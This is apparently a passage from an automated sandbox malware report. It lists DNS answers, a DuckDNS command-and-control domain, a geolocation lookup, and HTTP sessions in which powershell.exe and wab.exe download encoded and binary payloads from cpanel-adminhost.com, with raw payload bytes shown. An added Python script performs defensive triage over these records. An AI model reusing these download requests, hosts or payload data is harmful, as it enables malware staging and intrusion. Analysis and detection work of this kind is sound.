Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}
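The network tables in this part of the report carry the observations an analyst would turn into detections: a DuckDNS name (iwarsut775laudrye2.duckdns.org) resolving to the 172.111.137.132 peer that the TCP table shows talking to port 49738, wab.exe (Windows Mail) fetching geoplugin.net/json.gp, powershell.exe pulling a 462 KB text/plain file while presenting a Firefox User-Agent, and ten www.* lookups spaced roughly 13 to 18 seconds apart, three of which land on the same address. The Python below is an added example and is not Joe Sandbox code; it runs three triage checks over records constructed from these tables (timestamps shortened to microseconds). The dynamic-DNS suffixes beyond duckdns.org, the browser-process set and the geolocation-host set are assumptions for illustration, not values taken from the report.

```python
"""Triage checks over the network tables of a sandbox report.

Added example; not Joe Sandbox code. DNS_LOG and HTTP_LOG are constructed
from the DNS answers and HTTP sessions in this section (timestamps cut to
microseconds) so the checks run offline. DYNDNS_SUFFIXES beyond duckdns.org,
BROWSERS and GEO_HOSTS are assumptions, not values taken from the report.
"""
import ntpath
import statistics
from datetime import datetime, timedelta

DYNDNS_SUFFIXES = ("duckdns.org", "no-ip.com", "ddns.net")  # assumption: extend as needed
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}  # assumption
GEO_HOSTS = {"geoplugin.net"}  # public IP/geolocation services RATs use to fingerprint a victim


def ts(hms):
    """All report timestamps fall on 28 Aug 2024; only the time of day varies."""
    return datetime.fromisoformat("2024-08-28T" + hms)


# (query time, name, resolved address): constructed from the report's DNS tables
DNS_LOG = [
    (ts("14:01:11.392865"), "avocaldoperu.com", "104.21.62.202"),
    (ts("14:01:53.363734"), "iwarsut775laudrye2.duckdns.org", "172.111.137.132"),
    (ts("14:01:56.038767"), "geoplugin.net", "178.237.33.50"),
    (ts("14:02:00.408345"), "cpanel-adminhost.com", "193.25.216.165"),
    (ts("14:03:08.439939"), "www.ctorq.net", "3.33.130.190"),
    (ts("14:03:24.011481"), "www.vendasnaweb1.com", "162.241.2.92"),
    (ts("14:03:42.619318"), "www.411divorce.com", "5.78.41.174"),
    (ts("14:03:55.855211"), "www.gtprivatewealth.com", "3.33.130.190"),
    (ts("14:04:10.121747"), "www.katasoo.com", "188.114.96.3"),
    (ts("14:04:23.449765"), "www.martinminorgroup.com", "34.149.87.45"),
    (ts("14:04:36.589979"), "www.atlpicsstudios.com", "3.33.130.190"),
    (ts("14:04:49.681910"), "www.openhandedvision.com", "142.250.186.147"),
    (ts("14:05:03.744503"), "www.shabygreen.top", "203.161.41.205"),
    (ts("14:05:17.932250"), "www.kera333.org", "64.46.102.70"),
]

# (process path, Host header, request path, User-Agent): from the report's HTTP sessions
HTTP_LOG = [
    (r"C:\Program Files (x86)\Windows Mail\wab.exe", "geoplugin.net", "/json.gp", None),
    (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", "cpanel-adminhost.com",
     "/Stevns179.mix",
     "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0"),
]


def dynamic_dns_hits(records):
    """Names under a dynamic-DNS provider, with the address each resolved to."""
    return [(name, addr) for _, name, addr in records if name.endswith(DYNDNS_SUFFIXES)]


def domain_rotation(records, window=timedelta(seconds=60), min_unique=4):
    """Flag steady-cadence lookups of many distinct www.* hosts from one client.

    Returns None unless at least `min_unique` different www.* names are queried
    inside one `window`; otherwise the rotated names in query order, the median
    gap between consecutive lookups, and addresses shared by more than one name
    (decoy domains parked on the same IP are a useful pivot).
    """
    hits = sorted((t, n, a) for t, n, a in records if n.startswith("www."))
    for i, (t0, _, _) in enumerate(hits):
        if len({n for t, n, _ in hits[i:] if t - t0 <= window}) >= min_unique:
            break
    else:
        return None
    gaps = [(hits[k][0] - hits[k - 1][0]).total_seconds() for k in range(1, len(hits))]
    by_addr = {}
    for _, n, a in hits:
        by_addr.setdefault(a, []).append(n)
    return {
        "names": [n for _, n, _ in hits],
        "median_gap_s": statistics.median(gaps),
        "shared_ips": {a: ns for a, ns in by_addr.items() if len(ns) > 1},
    }


def suspicious_http(sessions):
    """Per session, the reasons the requesting process does not fit the traffic."""
    findings = []
    for proc, host, path, ua in sessions:
        exe = ntpath.basename(proc).lower()  # ntpath: Windows paths parsed on any OS
        reasons = []
        if exe not in BROWSERS:
            reasons.append("non-browser process issuing HTTP")
        if ua and "Mozilla/" in ua and exe not in BROWSERS:
            reasons.append("browser User-Agent from non-browser process")
        if host in GEO_HOSTS:
            reasons.append("external IP/geolocation lookup")
        if reasons:
            findings.append((exe, host + path, reasons))
    return findings


if __name__ == "__main__":
    print("dynamic DNS:", dynamic_dns_hits(DNS_LOG))
    print("rotation:", domain_rotation(DNS_LOG))
    for exe, url, reasons in suspicious_http(HTTP_LOG):
        print(exe, url, "->", "; ".join(reasons))
```

Against these records the rotation check fires on the first 60-second window (www.ctorq.net through www.gtprivatewealth.com), reports a median gap of about 14 seconds and shows 3.33.130.190 behind three of the ten names; the HTTP check flags wab.exe for the geolocation lookup and powershell.exe for the spoofed browser User-Agent. In production the same logic would read DNS and proxy logs with a process field rather than a sandbox export.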


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49742 | 193.25.216.165 | 80 | 5288 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Aug 28, 2024 14:02:00.433391094 CEST | 177 | OUT | GET /Stevns179.mix HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: cpanel-adminhost.com
Connection: Keep-Alive
Aug 28, 2024 14:02:01.145034075 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Wed, 28 Aug 2024 12:02:01 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Mon, 26 Aug 2024 05:10:49 GMT
ETag: "80bba-70df0-6208f25f0b0d4"
Accept-Ranges: bytes
Content-Length: 462320
Connection: close
Content-Type: text/plain; charset=UTF-8
Data Raw: 36 77 4a 64 63 4f 73 43 39 46 36 37 45 6a 30 63 41 48 45 42 6d 2b 73 43 4c 54 59 44 58 43 51 45 36 77 49 30 36 2b 73 43 30 43 53 35 75 53 31 49 57 48 45 42 6d 2b 73 43 69 61 69 42 36 55 36 47 38 6d 4a 78 41 5a 76 72 41 74 47 78 67 63 47 56 57 4b 6f 4b 63 51 47 62 63 51 47 62 36 77 4a 43 70 65 73 43 74 58 32 36 45 42 43 65 42 33 45 42 6d 33 45 42 6d 2b 73 43 64 73 70 78 41 5a 73 78 79 6e 45 42 6d 33 45 42 6d 34 6b 55 43 33 45 42 6d 2b 73 43 75 63 6e 52 34 6e 45 42 6d 33 45 42 6d 34 50 42 42 48 45 42 6d 2b 73 43 76 69 65 42 2b 61 37 46 61 41 4a 38 7a 58 45 42 6d 33 45 42 6d 34 74 45 4a 41 52 78 41 5a 74 78 41 5a 75 4a 77 33 45 42 6d 2b 73 43 75 35 75 42 77 35 74 37 58 67 48 72 41 74 4c 4e 63 51 47 62 75 73 31 68 51 37 37 72 41 72 62 62 36 77 4c 4f 58 34 48 79 5a 68 37 66 6d 48 45 42 6d 2b 73 43 33 4f 36 42 36 71 74 2f 6e 43 62 72 41 73 59 6a 63 51 47 62 36 77 4b 73 67 6e 45 42 6d 33 45 42 6d 2b 73 43 78 4d 53 4c 44 42 44 72 41 6d 33 50 36 77 49 68 2b 59 6b 4d 45 2b 73 43 75 48 46 78 41 5a 74 43 36 77 [TRUNCATED]
Data Ascii: [TRUNCATED]
Aug 28, 2024 14:02:01.145047903 CEST | 224 | IN | Data Raw: 62 43 68 59 50 39 44 44 43 4a 77 5a 39 42 47 74 6c 4c 6e 31 66 79 57 4f 4d 4e 4e 35 55 5a 6d 4d 71 35 4b 45 49 57 62 49 49 36 70 41 37 6b 51 68 5a 73 67 36 72 58 42 37 42 43 31 6d 79 41 56 51 42 66 35 39 77 5a 56 52 73 30 32 45 30 6d 54 38 5a 61
Data Ascii: bChYP9DDCJwZ9BGtlLn1fyWOMNN5UZmMq5KEIWbII6pA7kQhZsg6rXB7BC1myAVQBf59wZVRs02E0mT8Za5SwytoTyYlCCRe8fxhaMsvpHxlqFr+26D5/4ZskH1lnoQRP8ikfHM0ualF43485Ygw4rNUxQ4198cmJQgkYRh1ld416kEFJcgkUtHwF+YF9K1HL3lqR3wGVpwZHrX2eSkb3B8F9s8SKVKy
Aug 28, 2024 14:02:01.145060062 CEST | 1236 | IN | Data Raw: 45 65 72 42 42 53 58 49 4a 48 2b 45 33 68 75 44 6d 6d 67 61 4b 51 53 36 66 63 47 56 2b 2f 72 63 4f 74 6f 65 68 4b 57 49 4a 35 31 2f 6e 4b 54 38 52 2b 6c 36 66 43 57 49 42 55 6f 45 2b 41 59 62 4e 6f 68 6b 66 48 77 70 55 42 78 62 30 48 43 47 63 66
Data Ascii: EerBBSXIJH+E3huDmmgaKQS6fcGV+/rcOtoehKWIJ51/nKT8R+l6fCWIBUoE+AYbNohkfHwpUBxb0HCGcf4lfEfZdVw61RokpYgnnxy/5Hxrvl4/A8kkXFsTh508iGR8fDXV3Ya11MakCikmb9Ka+wT8HnsNCSReMs8FSEu83OCkUaoO6OaQncyRhQio7DwNkukS9xWa6OPEtwRDYGr3O0sPHNeSKBr6n6NB/WWHZ9KDBUYtL6j
Aug 28, 2024 14:02:01.145066023 CEST | 1236 | IN | Data Raw: 79 57 33 66 62 54 74 7a 61 50 71 53 79 55 59 70 59 65 6a 4d 67 64 50 4b 51 58 69 79 74 7a 4e 52 4d 78 6d 6e 35 52 62 78 39 49 56 4d 38 39 32 4c 37 38 2b 50 72 74 77 61 49 65 52 38 5a 59 76 48 34 56 61 4a 4a 47 76 7a 71 76 63 36 63 57 62 58 7a 4d
Data Ascii: yW3fbTtzaPqSyUYpYejMgdPKQXiytzNRMxmn5Rbx9IVM892L78+PrtwaIeR8ZYvH4VaJJGvzqvc6cWbXzMpVhAyyMWWHhfTbcWvMBAyfOCQex8771UJVkryYaH2wSGO9ZEiYoUi0HCNYHhYVjazWt3XUgvBA6rhcVP4aVC/CJP9GehpaqosPerxm8i9YpIgGGQyIZHxH+LDegOEkPGWcCnUV8svxDq+6BiTBm66ORVqlbBjlGEc
Aug 28, 2024 14:02:01.145078897 CEST | 1236 | IN | Data Raw: 4a 48 78 6c 69 44 31 4a 4c 6e 68 4e 52 76 73 74 4d 64 63 44 7a 68 55 4f 33 65 30 4e 7a 4a 32 77 43 33 69 58 4a 77 77 42 75 78 31 6d 49 75 4a 6d 33 7a 78 46 51 39 6f 66 68 4f 6b 6b 66 47 57 64 79 37 51 56 33 4a 58 63 46 45 6e 47 75 6e 46 6f 57 62
Data Ascii: JHxliD1JLnhNRvstMdcDzhUO3e0NzJ2wC3iXJwwBux1mIuJm3zxFQ9ofhOkkfGWdy7QV3JXcFEnGunFoWbZ20uIogqpcvitvRUw6j7M3gEzyeKDr4tl4rvjFz1wnruEiUKw8GmN8P63FLxyLbd+6qRSqsaY5fGWIKy19NzA/humWfWWeM6hLmnNWZYViNrPIqRZhFsr9Dsi57YfKO8dGwxiWIaVrev09ekev1qVN/hkXUAR+pf3
Aug 28, 2024 14:02:01.145095110 CEST | 1236 | IN | Data Raw: 33 53 54 38 5a 59 76 56 73 44 47 49 4a 48 78 6c 69 43 52 38 5a 59 67 6b 62 33 4e 54 67 66 44 46 43 44 2b 54 78 4e 6a 6b 66 49 66 34 38 4b 6a 4c 45 6f 64 77 48 4f 68 59 37 45 47 66 75 5a 77 5a 41 71 4d 6e 67 52 77 44 58 68 32 4b 59 46 73 38 4b 56
Data Ascii: 3ST8ZYvVsDGIJHxliCR8ZYgkb3NTgfDFCD+TxNjkfIf48KjLEodwHOhY7EGfuZwZAqMngRwDXh2KYFs8KVij4TdrFiKSEXJpJzu0XZb9eMqF/pfED09lWkepQPB/NIcRKOoRZ+hKQbkV7fJaHhpqx29xfOWIB501iGR8cWbCBfDgRACPtS3bRfTbRJdbRAajKQpgR8TCa9Qv1a+hKWjXczc4ojdYDKDiORTypCID1niBXW7PWYd
Aug 28, 2024 14:02:01.145109892 CEST | 1236 | IN | Data Raw: 32 7a 4e 2b 57 6b 38 6a 6a 41 6a 4d 72 59 52 63 63 59 35 71 63 46 2b 39 50 64 30 52 58 72 33 63 47 6d 4e 41 4b 70 61 2b 52 4b 4b 6b 68 4b 2f 49 75 77 67 35 76 59 7a 4d 74 7a 50 76 4b 47 32 45 4f 39 52 7a 37 48 41 2f 31 30 2b 5a 75 69 57 58 71 53
Data Ascii: 2zN+Wk8jjAjMrYRccY5qcF+9Pd0RXr3cGmNAKpa+RKKkhK/Iuwg5vYzMtzPvKG2EO9Rz7HA/10+ZuiWXqSGMfGhRfZm1ErVoBO9daAvApDufKFgSbNeVXBnJRZM/qFgryH2cXB/fqX4MKmQ0N5/z1wj0DGbAmo1gvmzPrYWyRSPaqwF7GVoEl7CBmAGLHn54p5PhXgLK5Pxlpt7UUAxEAL3SG6VWl0b6Ek76k+e5igenxbU9iwb
Aug 28, 2024 14:02:01.145123959 CEST | 1236 | IN | Data Raw: 6b 61 6b 71 5a 74 51 57 65 4f 64 4d 69 4f 38 7a 33 38 72 33 72 36 4f 49 52 74 38 4c 56 6f 36 37 42 2b 64 4b 2b 39 63 50 65 59 44 63 73 4b 64 68 6b 34 33 2b 54 56 65 41 48 72 44 2f 6c 45 51 55 76 47 57 49 4a 48 78 6c 69 43 52 38 5a 5a 55 31 45 64
Data Ascii: kakqZtQWeOdMiO8z38r3r6OIRt8LVo67B+dK+9cPeYDcsKdhk43+TVeAHrD/lEQUvGWIJHxliCR8ZZU1Ed06nR4uJUPGJD9wBo0IK/BlLUaZJIikfH+tlV0L3EovyW+73BnEKLcUKFgnV6TKXin5iXcfUCWItf60oI7R9Hq04hmn3EGKPhN3eTKefL0qDl+6/DkIXcDB98lcSN45aj+LifC23MqTrf8AHBl1nqIgqF6uF+FFKAK
Aug 28, 2024 14:02:01.145136118 CEST | 1236 | IN | Data Raw: 71 6b 4c 32 6a 6f 54 31 6a 6f 53 57 79 2f 56 75 4f 4f 48 35 43 77 6f 31 2b 69 70 38 6f 50 43 74 55 47 52 63 55 69 43 4a 38 35 36 69 54 41 33 66 6c 32 61 32 6d 68 59 61 32 75 66 4a 32 30 39 65 2f 2b 65 36 38 35 72 42 31 78 6f 77 44 49 48 52 70 6e
Data Ascii: qkL2joT1joSWy/VuOOH5Cwo1+ip8oPCtUGRcUiCJ856iTA3fl2a2mhYa2ufJ209e/+e685rB1xowDIHRpn4a6XF6WODor8ZT9N4HVQGJhXkqRkNgZXxfvge9ZYvkAPPIJHxliCR8ZYgkZdaG69P42fVSIGypFBRb8k0yJPDxSvBAVs0qgLIehlk/DbOx0+Fta3xF9ZU/htjEAe1nFs4F9YL+e2qGMcxPJPy3S48aJ/e7IbzST3+
                                                            Aug 28, 2024 14:02:01.145149946 CEST1236INData Raw: 38 79 69 70 79 68 58 5a 69 47 30 6f 32 2f 65 6d 61 78 4d 52 35 49 67 7a 36 6b 53 34 4d 71 68 4c 70 44 53 6d 62 49 4e 2f 2f 59 38 33 4c 79 70 67 35 75 77 33 4e 42 6f 6b 2f 63 66 49 46 34 61 54 76 68 6f 30 77 65 38 50 76 55 6a 63 75 62 34 6c 4e 2b
                                                            Data Ascii: 8yipyhXZiG0o2/emaxMR5Igz6kS4MqhLpDSmbIN//Y83Lypg5uw3NBok/cfIF4aTvho0we8PvUjcub4lN+JlqdojPu0FrIMZRbrGM6pVngjIZPxlkaeNqAgkfGWIJHxliCRk5Szs5dsh7fbuhgf379s75InIfZtAn74lp7ENe6raYDQhXBn6a3sLx0W1GunKDlrjqqhZ0FtbVhwYHa6/JyhZ6iaDipweMRV4dKpjwoO3SJA3xlu
                                                            Aug 28, 2024 14:02:01.150640965 CEST1236INData Raw: 70 73 48 4f 65 66 4e 6f 65 79 4e 73 43 36 52 38 5a 6d 76 62 56 75 57 49 4d 74 50 65 55 77 2f 52 68 66 57 73 2f 38 46 51 42 41 33 36 77 49 50 74 4a 6b 67 67 6e 69 57 49 4a 48 78 6c 69 43 52 38 5a 59 67 34 6c 31 5a 4f 75 57 45 47 56 68 32 49 36 4f
                                                            Data Ascii: psHOefNoeyNsC6R8ZmvbVuWIMtPeUw/RhfWs/8FQBA36wIPtJkggniWIJHxliCR8ZYg4l1ZOuWEGVh2I6OY8WfuB38iu2CdFRfmJ4uyw8BIi8hpqRfJvxd0DRAYeSCH2sC8GBefLgyXr/Dm7XRP3fwYESttBLHgG+sdZTDTZh4qMAkFlzY1SOx9ELDJsi6LWpRhnajw11Ctvn4VKM92XeY6NIMVvnVncHlyjH7nyFdLXz8tyR+U


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49744 | 193.25.216.165 | 80 | 1244 | C:\Program Files (x86)\Windows Mail\wab.exe
Timestamp | Bytes transferred | Direction | Data
Aug 28, 2024 14:02:32.464818954 CEST | 182 | OUT | GET /wWdnBiepyw166.bin HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                            Host: cpanel-adminhost.com
                                                            Cache-Control: no-cache
Aug 28, 2024 14:02:33.150626898 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                            Date: Wed, 28 Aug 2024 12:02:33 GMT
                                                            Server: Apache/2.2.15 (CentOS)
                                                            Last-Modified: Mon, 26 Aug 2024 05:08:20 GMT
                                                            ETag: "80bb9-42840-6208f1d1a701c"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 272448
                                                            Connection: close
                                                            Content-Type: application/octet-stream
                                                            Data Raw: 0e d8 b8 8b fa 88 2b 79 29 e6 d3 53 cd 3e 16 fe 7e dd 89 a5 6f 6a ad 4d d6 ed 12 34 74 16 d6 0e e4 6a c0 2e cc ec 46 ac 33 15 bc 8f 15 6e c0 11 bc ec 30 88 3c e1 57 d5 f9 88 53 48 81 47 54 80 f3 e5 ea 8f 7f 1e 47 f2 c9 06 76 9a fe f9 02 88 65 ed 91 27 31 0a 50 46 05 17 5d c1 80 77 a7 f0 86 f5 0a b9 b7 e3 79 92 1f 47 9d 45 80 cb 74 df e1 dd dc 42 8b 27 0d 27 33 fa e3 ed 08 26 e5 70 e8 a1 88 d9 42 4d 7e e3 94 d6 bc b4 2b 65 17 4f a4 0d 20 4e d5 94 2c 6c 44 e2 21 44 bc 92 ba 27 18 98 b8 fe e2 55 4c 2a f3 14 b1 ed c8 59 d4 21 0d 9e 4c c4 c5 ef 55 a2 09 d3 bc e6 70 5f 45 da 4f 7f 88 6a 6f 4b 9a bb d7 71 dc c8 ae 59 a2 fd ff a8 c6 62 dc 99 48 74 48 e3 9e 02 cb 35 91 a1 2b f9 30 a4 66 0a c0 42 a5 39 fe fb ec 9a 66 57 5a 28 ac b2 57 73 a8 f2 92 66 17 f2 ff 8a 7e 29 44 56 94 b4 1e 90 39 e0 7b 81 48 54 75 15 e7 66 1e 47 ab 2d 39 b0 2c cc ba 3b 5f 15 47 7c d4 d6 ff b0 54 78 d7 5a c4 07 19 82 f2 fc df 6b 0d aa f1 96 de da 6b a8 8f 2d 0a fa 70 62 b4 27 19 f5 dc cd 36 0d c9 d5 9d 52 5f 27 ef 9a e9 64 e5 79 c8 86 [TRUNCATED]
                                                            Data Ascii: +y)S>~ojM4tj.F3n0<WSHGTGve'1PF]wyGEtB''3&pBM~+eO N,lD!D'UL*Y!LUp_EOjoKqYbHtH5+0fB9fWZ(Wsf~)DV9{HTufG-9,;_G|TxZkk-pb'6R_'dy2_^f4Ptk HkO<<#i"fy>rT8+tp}coDLy&9<s'YmHPZ&rBo'`x"g#13!XLt15OXn0P%A$]_Jd[4ekjTt8,-:q$q&2M+#3-n|0my64l~JYOQU+sna?i#G)WXN;;58hcmNZck/Z a+&/40-s$X~PqTag,D-bhCw!9p)\:"p!sWR#%{b<[A;0F}X@A&pp6drSM&4H9/}42VoxgN&Bq1-ZyV0*(0gpK;tl$>-rZDYd:MR!A^[(V<+UD
                                                            Aug 28, 2024 14:02:33.150649071 CEST1236INData Raw: 83 38 ac ef cc 9d 9d 7f fd 8e dd 00 70 ab f2 fb c7 7c ff b8 a3 df b8 52 2c 85 d4 ec 55 cd 31 6f 73 d6 e8 96 24 2d c3 9a 1a 7e 60 0a 90 f0 b3 0f f6 f9 fc 64 13 76 fe fd fe 5d de df 15 92 cb 10 d2 7e 47 e3 15 5a 77 23 fb a7 8f 6b 5d 3a 93 a5 0e 93
                                                            Data Ascii: 8p|R,U1os$-~`dv]~GZw#k]:KGub.!R(ExpE\[C]g$0\z^JoC-=G^rr'2-U>ayGEtB''3&p2Bw.nD
                                                            Aug 28, 2024 14:02:33.150659084 CEST1236INData Raw: c9 5e f5 72 f7 72 ca 0b a5 d1 1a 27 32 cb d3 86 2d 14 55 3e 61 e7 a7 f0 86 f5 0a b9 b7 e3 79 92 1f 47 9d 45 80 cb 74 df e1 dd dc 42 8b 27 0d 27 33 fa e3 ed b0 26 e5 70 e6 be 32 d7 42 f9 77 2e b5 6e bd f8 e6 44 43 27 cd 7e 00 3e a7 fb 4b 1e 25 8f
                                                            Data Ascii: ^rr'2-U>ayGEtB''3&p2Bw.nDC'~>K%'Hl'9D}`(X-p_E6~R+H;9n/RE4UR1_WZjPZ(Ws#)aS99{HTgF-9(;_G|?TxJkMk-p
                                                            Aug 28, 2024 14:02:33.150670052 CEST672INData Raw: 73 a8 f2 c2 23 17 f2 b3 8b 7f 29 61 53 39 ed 1e 90 39 e0 7b 81 48 54 95 15 e5 67 15 46 a0 2d 39 a6 28 cc ba 3b 5f 15 47 7c d4 d6 3f a4 54 78 d7 4a c4 07 19 b2 f6 fc df 6b 4d aa f1 86 de da 6b aa 8f 2d 0c fa 70 62 b4 27 19 f5 da cd 36 0d c9 d5 9d
                                                            Data Ascii: s#)aS99{HTgF-9(;_G|?TxJkMk-pb'6R_fy2]^&4@tk HkO,<#i"fy>rT8+tp}coDLy&9<s'YmHPZ&rBo'`x"g#13!XLt15
                                                            Aug 28, 2024 14:02:33.150681019 CEST1236INData Raw: 6c a5 24 1c ae 3e 91 2d f0 9c a6 04 a5 72 0a 99 5a bb 44 b7 59 64 3a 4d 8c 98 52 21 d9 fd 41 94 f3 5e 5b 28 56 3c 2b b3 b0 14 55 44 f9 83 38 ac ef cc 9d 9d 7f fd db 56 ec 23 fd a5 42 9b 6a ff b8 90 29 07 a3 64 85 d4 57 3a 94 31 6f 98 d1 65 32 00
                                                            Data Ascii: l$>-rZDYd:MR!A^[(V<+UD8V#Bj)dW:1oe2-QSD72~GpBdU.2p~,.BF gu&7Y!*s0|=%Ux_-AE3TYLC2/qAd>$>>@U><
                                                            Aug 28, 2024 14:02:33.150691986 CEST1236INData Raw: a6 c3 e3 7a 8f 58 81 00 30 52 a6 7a ff 89 68 11 20 d0 27 f2 51 9a 6b d6 b5 c8 d6 51 f1 bb 17 ac d1 8f f9 a6 d1 3f 53 7b de 97 1e 14 a4 9e 36 31 71 f7 72 47 8e 95 2d e5 d8 58 cb 83 41 a8 38 a9 c1 9e e7 a7 f0 86 1d cd a3 b7 e3 fa 56 13 74 54 76 52
                                                            Data Ascii: zX0Rzh 'QkQ?S{61qrG-XA8VtTvRB!#ZB$Wau<A*g9[@AfH%x",Cq}+d*`x%B-P~"gglfp{n}x-:XPWCZ(WsJV##4nkgA0Hj
                                                            Aug 28, 2024 14:02:33.150702000 CEST1236INData Raw: 2b fe a4 38 69 4c 28 83 41 2a 6e 91 e6 f9 6c 3f f9 ef 9e db 00 be 7d 90 f0 b7 84 54 98 e7 ab f1 f4 99 16 50 fa 3b 74 a5 19 a9 57 d8 40 73 a8 8e 1f ae 92 2e 4f 74 80 41 d1 fd 4a f3 4e 78 c5 e0 7b 81 cb 90 9d aa 8a 3e 15 46 2d 49 1d a6 90 79 3b 75
                                                            Data Ascii: +8iL(A*nl?}TP;tW@s.OtAJNx{>F-Iy;uD.^I>r9s4#jwKH?5=qG_h^6]^&14@(8h\c}xK_o*We`6>T0 6aO_6#Rt.v*
                                                            Aug 28, 2024 14:02:33.150715113 CEST1236INData Raw: a5 db 5a e0 25 7a 94 7b 03 14 52 96 07 a2 60 99 22 14 39 4f c6 66 93 80 ec f1 40 2b 74 32 0a ed a3 70 01 eb 7d 63 8c e2 f1 b0 bd 8e 43 35 5b 6e b9 c1 2f f5 8a 3e db 60 e2 4c 4b 88 d1 5f 08 5d 58 26 72 6a e6 e7 1c f1 c3 95 e4 7a 47 e5 a3 c6 83 c9
                                                            Data Ascii: Z%z{R`"9Of@+t2p}cC5[n/>`LK_]X&rjzG`^1Ob$IJX`Y,'cOe\pG-:^]da&a%yhVz$h,fBIrQ$q[/w#."P#LvwML:54diYu"DjL
                                                            Aug 28, 2024 14:02:33.150727987 CEST896INData Raw: b5 ad 61 51 50 1f 6f bf 38 37 1d 5a cd 4b ee 18 72 2e 7a 29 e5 8e f1 74 e4 c9 9f 8f 94 55 68 cf 5a 6f 0f 41 d6 67 33 14 cd c7 d6 10 03 59 4c 63 6e 68 c3 81 28 0a 54 12 dc 3a 14 af a4 16 0b 99 35 c8 00 b7 6e 8f 85 da 5b 54 fa e4 ff a6 6d 5f b7 ee
                                                            Data Ascii: aQPo87ZKr.z)tUhZoAg3YLcnh(T:5n[Tm_Ge:)WXc;;mQ8XA.@["/Z<we_!/Vn6d5X^[ rO6|2cci*2a3OWtCc,:=s-BuCP`
                                                            Aug 28, 2024 14:02:33.150738001 CEST1236INData Raw: 82 3d 3b df 59 c7 5f 59 26 9a b7 de 79 74 63 57 ad dc a3 26 3b fa b5 72 d3 66 69 b1 51 91 7e a9 f9 84 e7 ee 0d 87 17 f2 74 7b 0f b2 61 30 86 8c 53 94 5e fa c3 77 97 e8 b7 87 b9 1e 85 09 93 39 97 33 02 7d 70 24 45 eb b6 3f 98 e2 4c 1b ae 22 ad 38
                                                            Data Ascii: =;Y_Y&ytcW&;rfiQ~t{a0S^w93}p$E?L"8!$3C_UADB$pxe8HP%8q0NE>7~7pe,0#bf9(H=<;N)mLQ;jq&8]S
                                                            Aug 28, 2024 14:02:33.155635118 CEST1236INData Raw: b9 58 f5 94 1a af 37 c4 78 ec 4a 2e 7a 2a e5 8e f1 74 e4 c9 9f 8f 92 4d b7 03 9a 35 84 a4 f7 06 47 19 fd f3 1e 9a fd a6 b0 64 7d 59 0d cb 7c cd 05 d4 99 56 2b 17 d9 14 0b 96 33 b7 0d e8 30 5f 49 59 6a fa 11 7c 2a 5e 84 0a 77 14 d1 e2 df e2 af c1
                                                            Data Ascii: X7xJ.z*tM5Gd}Y|V+30_IYj|*^w5ChcmZ(l$U6$frcQ+'C_xuoy!>h$XOj0Tayxj0\T%lzp*\zo=os<mtK5h\3


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49745 | 3.33.130.190 | 80 | 792 | C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
Timestamp | Bytes transferred | Direction | Data
